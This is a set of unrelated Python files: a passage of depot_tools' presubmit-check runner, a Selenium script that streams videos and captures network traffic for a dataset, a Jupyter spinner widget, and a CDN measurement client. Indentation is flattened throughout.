def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = list(filter(file_filter, self._affected_files))
if include_deletes:
return affected
return list(filter(lambda x: x.Action() != 'D', affected))
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
      warn('AffectedTestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
"""An iterator over all text lines in 'new' version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).decode('utf-8', 'ignore').splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = set([os.path.dirname(f) for f in files])
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
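# Illustrative walk (hypothetical paths): for files=['a/b/c.cc'] and
# root='/repo', the candidate directories are /repo/a/b, /repo/a and /repo,
# so a PRESUBMIT.py in any of those directories would be returned.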
class GetTryMastersExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, project, change):
"""Executes GetPreferredTryMasters() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
project: Project name to pass to presubmit script for bot selection.
Return:
A map of try masters to map of builders to set of tests.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'GetPreferredTryMasters'
if function_name not in context:
return {}
get_preferred_try_masters = context[function_name]
    if len(inspect.getargspec(get_preferred_try_masters)[0]) != 2:
raise PresubmitFailure(
'Expected function "GetPreferredTryMasters" to take two arguments.')
return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, gerrit_obj, change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
gerrit_obj: The GerritAccessor object.
change: The Change object.
Return:
A list of results objects.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
    if len(inspect.getargspec(post_upload_hook)[0]) != 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(gerrit_obj, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.items(),
masters2.items()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.items():
new_builders.setdefault(builder, set([])).update(tests)
return result
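# Worked example (hypothetical maps):
#   _MergeMasters({'m': {'b1': {'t1'}}},
#                 {'m': {'b1': {'t2'}, 'b2': set()}})
# returns {'m': {'b1': {'t1', 't2'}, 'b2': set()}}.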
def DoGetTryMasters(change,
changed_files,
repository_root,
default_presubmit,
project,
verbose,
output_stream):
"""Get the list of try masters from the presubmit scripts.
Args:
changed_files: List of modified files.
repository_root: The repository root.
default_presubmit: A default presubmit script to execute in any case.
project: Optional name of a project used in selecting trybots.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
Return:
Map of try masters to map of builders to set of tests.
"""
presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
if not presubmit_files and verbose:
output_stream.write('Warning, no PRESUBMIT.py found.\n')
results = {}
executer = GetTryMastersExecuter()
if default_presubmit:
if verbose:
output_stream.write('Running default presubmit script.\n')
fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
results = _MergeMasters(results, executer.ExecPresubmitScript(
default_presubmit, fake_path, project, change))
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results = _MergeMasters(results, executer.ExecPresubmitScript(
presubmit_script, filename, project, change))
# Make sets to lists again for later JSON serialization.
for builders in results.values():
for builder in builders:
builders[builder] = list(builders[builder])
if results and verbose:
output_stream.write('%s\n' % str(results))
return results
def DoPostUploadExecuter(change,
gerrit_obj,
verbose):
"""Execute the post upload hook.
Args:
change: The Change object.
gerrit_obj: The GerritAccessor object.
verbose: Prints debug info.
"""
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
executer = GetPostUploadExecuter()
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, gerrit_obj, change))
if not results:
return 0
sys.stdout.write('\n')
sys.stdout.write('** Post Upload Hook Messages **\n')
exit_code = 0
for result in results:
if result.fatal:
exit_code = 1
result.handle()
sys.stdout.write('\n')
return exit_code
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose, gerrit_obj, dry_run=None,
thread_pool=None, parallel=False, use_python3=False):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
use_python3: if true, will use python3 instead of python2 by default
if USE_PYTHON3 is not specified.
"""
self.change = change
self.committing = committing
self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
self.use_python3 = use_python3
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
presubmit_dir = os.path.dirname(presubmit_path)
os.chdir(presubmit_dir)
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
# Try to figure out whether these presubmit checks should be run under
# python2 or python3. We need to do this without actually trying to
# compile the text, since the text might compile in one but not the
# other.
m = re.search('^USE_PYTHON3 = (True|False)$', script_text,
flags=re.MULTILINE)
if m:
use_python3 = m.group(1) == 'True'
else:
use_python3 = self.use_python3
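    # For example (illustrative): a PRESUBMIT.py whose text contains the
    # line 'USE_PYTHON3 = True' returns no results when this runs under
    # python2; its checks execute only under python3, and vice versa.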
if (((sys.version_info.major == 2) and use_python3) or
((sys.version_info.major == 3) and not use_python3)):
return []
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
context['__args'] = (input_api, output_api)
# Get path of presubmit directory relative to repository root.
    # Always use forward slashes, so that the path is the same on *nix and
    # Windows.
root = input_api.change.RepositoryRoot()
rel_path = os.path.relpath(presubmit_dir, root)
rel_path = rel_path.replace(os.path.sep, '/')
# Get the URL of git remote origin and use it to identify host and project
host = project = ''
if self.gerrit:
host = self.gerrit.host or ''
project = self.gerrit.project or ''
# Prefix for test names
prefix = 'presubmit:%s/%s:%s/' % (host, project, rel_path)
# Perform all the desired presubmit checks.
results = []
try:
version = [
int(x) for x in context.get('PRESUBMIT_VERSION', '0.0.0').split('.')
]
with rdb_wrapper.client(prefix) as sink:
if version >= [2, 0, 0]:
for function_name in context:
if not function_name.startswith('Check'):
continue
if function_name.endswith('Commit') and not self.committing:
continue
if function_name.endswith('Upload') and self.committing:
continue
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, sink))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
else: # Old format
if self.committing:
function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in context:
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, sink))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
for f in input_api._named_temporary_files:
os.remove(f)
# Return the process to the original working directory.
os.chdir(main_path)
return results
def _run_check_function(self, function_name, context, sink=None):
"""Evaluates and returns the result of a given presubmit function.
If sink is given, the result of the presubmit function will be reported
to the ResultSink.
Args:
function_name: the name of the presubmit function to evaluate
context: a context dictionary in which the function will be evaluated
sink: an instance of ResultSink. None, by default.
Returns:
the result of the presubmit function call.
"""
start_time = time_time()
try:
result = eval(function_name + '(*__args)', context)
self._check_result_type(result)
except Exception:
if sink:
elapsed_time = time_time() - start_time
sink.report(function_name, rdb_wrapper.STATUS_FAIL, elapsed_time)
# TODO(crbug.com/953884): replace reraise with native py3:
# raise .. from e
e_type, e_value, e_tb = sys.exc_info()
print('Evaluation of %s failed: %s' % (function_name, e_value))
six.reraise(e_type, e_value, e_tb)
elapsed_time = time_time() - start_time
if elapsed_time > 10.0:
sys.stdout.write(
'%s took %.1fs to run.\n' % (function_name, elapsed_time))
if sink:
status = rdb_wrapper.STATUS_PASS
if any(r.fatal for r in result):
status = rdb_wrapper.STATUS_FAIL
sink.report(function_name, status, elapsed_time)
return result
def _check_result_type(self, result):
"""Helper function which ensures result is a list, and all elements are
instances of OutputApi.PresubmitResult"""
if not isinstance(result, (tuple, list)):
raise PresubmitFailure('Presubmit functions must return a tuple or list')
if not all(isinstance(res, OutputApi.PresubmitResult) for res in result):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
def DoPresubmitChecks(change,
committing,
verbose,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False,
json_output=None,
use_python3=False):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
use_python3: if true, default to using Python3 for presubmit checks
rather than Python2.
Return:
1 if presubmit checks failed or 0 otherwise.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
python_version = 'Python %s' % sys.version_info.major
if committing:
sys.stdout.write('Running %s presubmit commit checks ...\n' %
python_version)
else:
sys.stdout.write('Running %s presubmit upload checks ...\n' %
python_version)
start_time = time_time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
dry_run, thread_pool, parallel, use_python3)
if default_presubmit:
if verbose:
sys.stdout.write('Running default presubmit script.\n')
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
messages = {}
should_prompt = False
presubmits_failed = False
for result in results:
if result.fatal:
presubmits_failed = True
messages.setdefault('ERRORS', []).append(result)
elif result.should_prompt:
should_prompt = True
messages.setdefault('Warnings', []).append(result)
else:
messages.setdefault('Messages', []).append(result)
sys.stdout.write('\n')
for name, items in messages.items():
sys.stdout.write('** Presubmit %s **\n' % name)
for item in items:
item.handle()
sys.stdout.write('\n')
total_time = time_time() - start_time
if total_time > 1.0:
sys.stdout.write(
'Presubmit checks took %.1fs to calculate.\n\n' % total_time)
if not should_prompt and not presubmits_failed:
sys.stdout.write('%s presubmit checks passed.\n' % python_version)
elif should_prompt:
sys.stdout.write('There were %s presubmit warnings. ' % python_version)
if may_prompt:
presubmits_failed = not prompt_should_continue(
'Are you sure you wish to continue? (y/N): ')
else:
sys.stdout.write('\n')
if json_output:
# Write the presubmit results to json output
presubmit_results = {
'errors': [
error.json_format()
for error in messages.get('ERRORS', [])
],
'notifications': [
notification.json_format()
for notification in messages.get('Messages', [])
],
'warnings': [
warning.json_format()
for warning in messages.get('Warnings', [])
],
'more_cc': executer.more_cc,
}
gclient_utils.FileWrite(
json_output, json.dumps(presubmit_results, sort_keys=True))
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
sys.stdout.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return 1 if presubmits_failed else 0
finally:
os.environ = old_environ
def _scan_sub_dirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def _parse_files(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in _scan_sub_dirs(arg, recursive)])
return files
def _parse_change(parser, options):
"""Process change options.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GitChange if the change root is a git repository, or a Change otherwise.
"""
if options.files and options.all_files:
parser.error('<files> cannot be specified when --all-files is set.')
change_scm = scm.determine_scm(options.root)
if change_scm != 'git' and not options.files:
parser.error('<files> is not optional for unversioned directories.')
if options.files:
change_files = _parse_files(options.files, options.recursive)
elif options.all_files:
change_files = [('M', f) for f in scm.GIT.GetAllFiles(options.root)]
else:
change_files = scm.GIT.CaptureStatus(
options.root, options.upstream or None)
logging.info('Found %d file(s).', len(change_files))
change_class = GitChange if change_scm == 'git' else Change
return change_class(
options.name,
options.description,
options.root,
change_files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream)
def _parse_gerrit_options(parser, options):
"""Process gerrit options.
SIDE EFFECTS: Modifies options.author and options.description from Gerrit if
options.gerrit_fetch is set.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GerritAccessor object if options.gerrit_url is set, or None otherwise.
"""
gerrit_obj = None
if options.gerrit_url:
gerrit_obj = GerritAccessor(
url=options.gerrit_url,
project=options.gerrit_project,
branch=options.gerrit_branch)
if not options.gerrit_fetch:
return gerrit_obj
if not options.gerrit_url or not options.issue or not options.patchset:
parser.error(
'--gerrit_fetch requires --gerrit_url, --issue and --patchset.')
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(
options.issue, options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
return gerrit_obj
@contextlib.contextmanager
def canned_check_filter(method_names):
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warning('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.items():
setattr(presubmit_canned_checks, name, method)
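# Usage sketch (hypothetical check name): temporarily no-op a canned check
# for the duration of a presubmit run, then restore it:
#   with canned_check_filter(['CheckChangeHasNoTabs']):
#     DoPresubmitChecks(...)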
def main(argv=None):
parser = argparse.ArgumentParser(usage='%(prog)s [options] <files...>')
hooks = parser.add_mutually_exclusive_group()
hooks.add_argument('-c', '--commit', action='store_true',
help='Use commit instead of upload checks.')
hooks.add_argument('-u', '--upload', action='store_false', dest='commit',
help='Use upload instead of commit checks.')
hooks.add_argument('--post_upload', action='store_true',
help='Run post-upload commit hooks.')
parser.add_argument('-r', '--recursive', action='store_true',
help='Act recursively.')
parser.add_argument('-v', '--verbose', action='count', default=0,
help='Use 2 times for more debug info.')
parser.add_argument('--name', default='no name')
parser.add_argument('--author')
desc = parser.add_mutually_exclusive_group()
desc.add_argument('--description', default='', help='The change description.')
desc.add_argument('--description_file',
help='File to read change description from.')
parser.add_argument('--issue', type=int, default=0)
parser.add_argument('--patchset', type=int, default=0)
parser.add_argument('--root', default=os.getcwd(),
help='Search for PRESUBMIT.py up to this directory. '
'If inherit-review-settings-ok is present in this '
'directory, parent directories up to the root file '
'system directories will also be searched.')
parser.add_argument('--upstream',
help='Git only: the base ref or upstream branch against '
'which the diff should be computed.')
parser.add_argument('--default_presubmit')
parser.add_argument('--may_prompt', action='store_true', default=False)
parser.add_argument('--skip_canned', action='append', default=[],
help='A list of checks to skip which appear in '
'presubmit_canned_checks. Can be provided multiple times '
'to skip multiple canned checks.')
parser.add_argument('--dry_run', action='store_true', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_url', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_project', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_branch', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_fetch', action='store_true',
help=argparse.SUPPRESS)
parser.add_argument('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in '
'all PRESUBMIT files in parallel.')
parser.add_argument('--json_output',
help='Write presubmit errors to json output.')
parser.add_argument('--all_files', action='store_true',
help='Mark all files under source control as modified.')
parser.add_argument('files', nargs='*',
help='List of files to be marked as modified when '
'executing presubmit or post-upload hooks. fnmatch '
'wildcards can also be used.')
parser.add_argument('--use-python3', action='store_true',
help='Use python3 for presubmit checks by default')
options = parser.parse_args(argv)
log_level = logging.ERROR
if options.verbose >= 2:
log_level = logging.DEBUG
elif options.verbose:
log_level = logging.INFO
log_format = ('[%(levelname).1s%(asctime)s %(process)d %(thread)d '
'%(filename)s] %(message)s')
logging.basicConfig(format=log_format, level=log_level)
if options.description_file:
options.description = gclient_utils.FileRead(options.description_file)
gerrit_obj = _parse_gerrit_options(parser, options)
change = _parse_change(parser, options)
try:
if options.post_upload:
return DoPostUploadExecuter(
change,
gerrit_obj,
options.verbose)
with canned_check_filter(options.skip_canned):
return DoPresubmitChecks(
change,
options.commit,
options.verbose,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel,
options.json_output,
options.use_python3)
except PresubmitFailure as e:
print(e, file=sys.stderr)
print('Maybe your depot_tools is out of date?', file=sys.stderr)
return 2
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
streaming_generator.py
|
import sys
sys.path.insert(0, "/home/mclrn/dlproject/")
import datetime
from threading import Thread
from selenium import webdriver
from slackclient import SlackClient
import traceback
import os
from selenium.webdriver.support.ui import WebDriverWait
# import trafficgen.Streaming.win_capture as cap
# import trafficgen.Streaming.streaming_types as stream
import unix_capture as cap
import streaming_types as stream
from constants import SLACK_TOKEN
def notifySlack(message):
sc = SlackClient(SLACK_TOKEN)
try:
sc.api_call("chat.postMessage", channel="#server", text=message)
except:
sc.api_call("chat.postMessage", channel="#server", text="Could not send stacktrace")
def generate_streaming(duration, dir, total_iterations, options=None):
iterations = 0
stream_types = {
# 'hbo': (stream.HboNordic, 1),
# 'netflix': (stream.Netflix, 1),
'twitch': (stream.Twitch, 5),
'youtube': (stream.Youtube, 5),
'drtv': (stream.DrTv, 5),
}
while iterations < total_iterations:
print("Iteration:", iterations)
if iterations % 25 == 0:
notifySlack("Starting iteration: " + str(iterations))
try:
for stream_type in stream_types.keys():
                browsers, capture_thread, file, streaming_threads = [], [], [], []
                stream_cls, num_threads = stream_types[stream_type]
                browsers, capture_thread, file, streaming_threads = \
                    generate_threaded_streaming(stream_cls, stream_type, dir,
                                                duration, options,
                                                num_threads=num_threads)
try:
capture_thread.start()
for thread in streaming_threads:
# Start streaming threads
thread.start()
print("streaming started", stream_type)
capture_thread.join() # Stream until the capture thread joins
print("capture done - thread has joined")
except Exception as e:
notifySlack("Something went wrong %s" % traceback.format_exc())
# Wait for capture thread
capture_thread.join()
                # Do a cleanup since something went wrong
cap.cleanup(file)
try:
for browser in browsers:
browser.close()
browser.quit()
except Exception as e:
notifySlack("Something went wrong %s" % traceback.format_exc())
# os.system("killall chrome")
# os.system("killall chromedriver")
except Exception as ex:
notifySlack("Something went wrong when setting up the threads \n %s" % traceback.format_exc())
iterations += 1
def generate_threaded_streaming(obj: stream.Streaming, stream_name, dir, duration, chrome_options=None, num_threads=5):
#### STREAMING ####
# Create filename
now = datetime.datetime.now()
file = dir + "/%s-%.2d%.2d_%.2d%.2d%.2d.pcap" % (stream_name, now.day, now.month, now.hour, now.minute, now.second)
# Instantiate thread
capture_thread = Thread(target=cap.captureTraffic, args=(1, duration, dir, file))
    # Create num_threads threads for streaming
streaming_threads = []
browsers = []
for i in range(num_threads):
browser = webdriver.Chrome(options=chrome_options)
browser.implicitly_wait(10)
browsers.append(browser)
t = Thread(target=obj.stream_video, args=(obj, browser))
streaming_threads.append(t)
return browsers, capture_thread, file, streaming_threads
def get_clear_browsing_button(driver):
"""Find the "CLEAR BROWSING BUTTON" on the Chrome settings page. /deep/ to go past shadow roots"""
return driver.find_element_by_css_selector('* /deep/ #clearBrowsingDataConfirm')
def clear_cache(driver, timeout=60):
"""Clear the cookies and cache for the ChromeDriver instance."""
# navigate to the settings page
driver.get('chrome://settings/clearBrowserData')
# wait for the button to appear
wait = WebDriverWait(driver, timeout)
wait.until(get_clear_browsing_button)
# click the button to clear the cache
get_clear_browsing_button(driver).click()
# wait for the button to be gone before returning
wait.until_not(get_clear_browsing_button)
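# Usage sketch (assumes an existing ChromeDriver session):
#   driver = webdriver.Chrome()
#   clear_cache(driver)  # wipe cookies/cache between capture iterations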
if __name__ == "__main__":
#netflixuser = os.environ["netflixuser"]
#netflixpassword = os.environ["netflixpassword"]
#hbouser = os.environ["hbouser"]
#hbopassword = os.environ["hbopassword"]
# slack_token = os.environ['slack_token']
# Specify duration in seconds
duration = 60 * 1
total_iterations = 1000
save_dir = '/home/mclrn/Data'
chrome_profile_dir = "/home/mclrn/.config/google-chrome/"
options = webdriver.ChromeOptions()
#options.add_argument('user-data-dir=' + chrome_profile_dir)
options.add_argument("--enable-quic")
# options.add_argument('headless')
generate_streaming(duration, save_dir, total_iterations, options)
print("something")
|
halo_notebook.py
|
from __future__ import absolute_import, print_function, unicode_literals
import sys
import threading
import cursor
from halo import Halo
from halo._utils import decode_utf_8_text
class HaloNotebook(Halo):
def __init__(self, text='', color='cyan', spinner=None, placement='left',
animation=None, interval=-1, enabled=True, stream=sys.stdout):
super(HaloNotebook, self).__init__(text=text, color=color, spinner=spinner,
placement=placement,
animation=animation,
interval=interval, enabled=enabled,
stream=stream)
self.output = self._make_output_widget()
def _make_output_widget(self):
from ipywidgets.widgets import Output
return Output()
# TODO: using property and setter
def _output(self, text=''):
return ({'name': 'stdout', 'output_type': 'stream', 'text': text},)
def clear(self):
if not self._enabled:
return self
with self.output:
self.output.outputs += self._output('\r')
self.output.outputs += self._output(self.CLEAR_LINE)
self.output.outputs = self._output()
return self
def _render_frame(self):
frame = self.frame()
output = '\r{0}'.format(frame)
with self.output:
self.output.outputs += self._output(output)
def start(self, text=None):
if text is not None:
self.text = text
if not self._enabled or self._spinner_id is not None:
return self
if self._stream.isatty():
cursor.hide()
self.output = self._make_output_widget()
from IPython.display import display
display(self.output)
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
self._spinner_thread.setDaemon(True)
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop_and_persist(self, symbol=' ', text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self._enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text['original']
text = text.strip()
self.stop()
        if self._placement == 'right':
            first, second = text, symbol
        else:
            first, second = symbol, text
        output = '\r{0} {1}\n'.format(first, second)
with self.output:
self.output.outputs = self._output(output)
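# Usage sketch (assumes a Jupyter environment with ipywidgets available;
# the 'dots' spinner name is an assumption about Halo's built-in spinners):
#   spinner = HaloNotebook(text='Loading', spinner='dots')
#   spinner.start()
#   ...  # long-running work
#   spinner.stop_and_persist(symbol='+', text='Done')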
|
active_measurements.py
|
import socket
import urlparse
import os
import sys
import threading
import Queue
import subprocess
import time
import errno
DNS_PORT_SEND = 51004
DNS_PORT_RECV = 51003
DNS_HOST = socket.gethostbyname('cs5700cdnproject.ccs.neu.edu')
# Initiates active measurements
def active_measurements():
pipe = Queue.Queue()
# global clients, clients_lock
# clients = set()
# clients_lock = threading.Lock()
# t1 = threading.Thread(target=get_new_clients, args=(pipe,))
# t2 = threading.Thread(target=send_measurements, args=(pipe,))
global dns_socket_send
    dns_socket_send = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
get_new_clients(pipe)
# t1.start()
# t2.start()
# Data format: 'token1$token2$...$tokenN'
# Fetches data from DNS server.
def get_new_clients(pipe):
connected = False
new = ''
data = None
dns_socket_recv = None
buff_size = 65535
clients = set()
while True:
if not connected:
try:
dns_socket_recv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dns_socket_recv.connect((DNS_HOST, DNS_PORT_RECV))
dns_socket_recv.setblocking(0)
connected = True
except socket.error as e:
pass
try:
if connected:
data = dns_socket_recv.recv(buff_size)
new = data
                # print('Received from DNS: ' + data)
except socket.error as se:
errnum = se.args[0]
if errnum == errno.EPIPE:
connected = False
# print('this:' + str(new))
if new != '':
# print(new)
# time.sleep(3)
new = filter(lambda x: x!='', new.split('$'))
for ip in new:
# if ip not in clients:
# print('new ip: ' + ip)
clients.add(ip)
new = ''
if len(clients) > 0:
send_measurements(clients)
# if pipe.empty():
# pipe.put(clients)
# new = ''
# print(list(pipe.queue))
# if data == '':
# connected = False
# Sends back the scamper ping results to DNS server.
def send_measurements(ip_list):
fp = open('ips', 'w+')
fp.write('\n')
fp.close()
connected = True
results = ''
global dns_socket_send
while True:
if len(ip_list) > 0:
# print('in')
results = scamper(list(ip_list))
try:
dns_socket_send.send(results)
except socket.error as se:
errnum = se.args[0]
                if errnum in (errno.EPIPE, errno.ENOTCONN):
connected = False
if len(ip_list) > 0:
fp = open('ips', 'w+')
fp.write(str(results) + '\n')
fp.close()
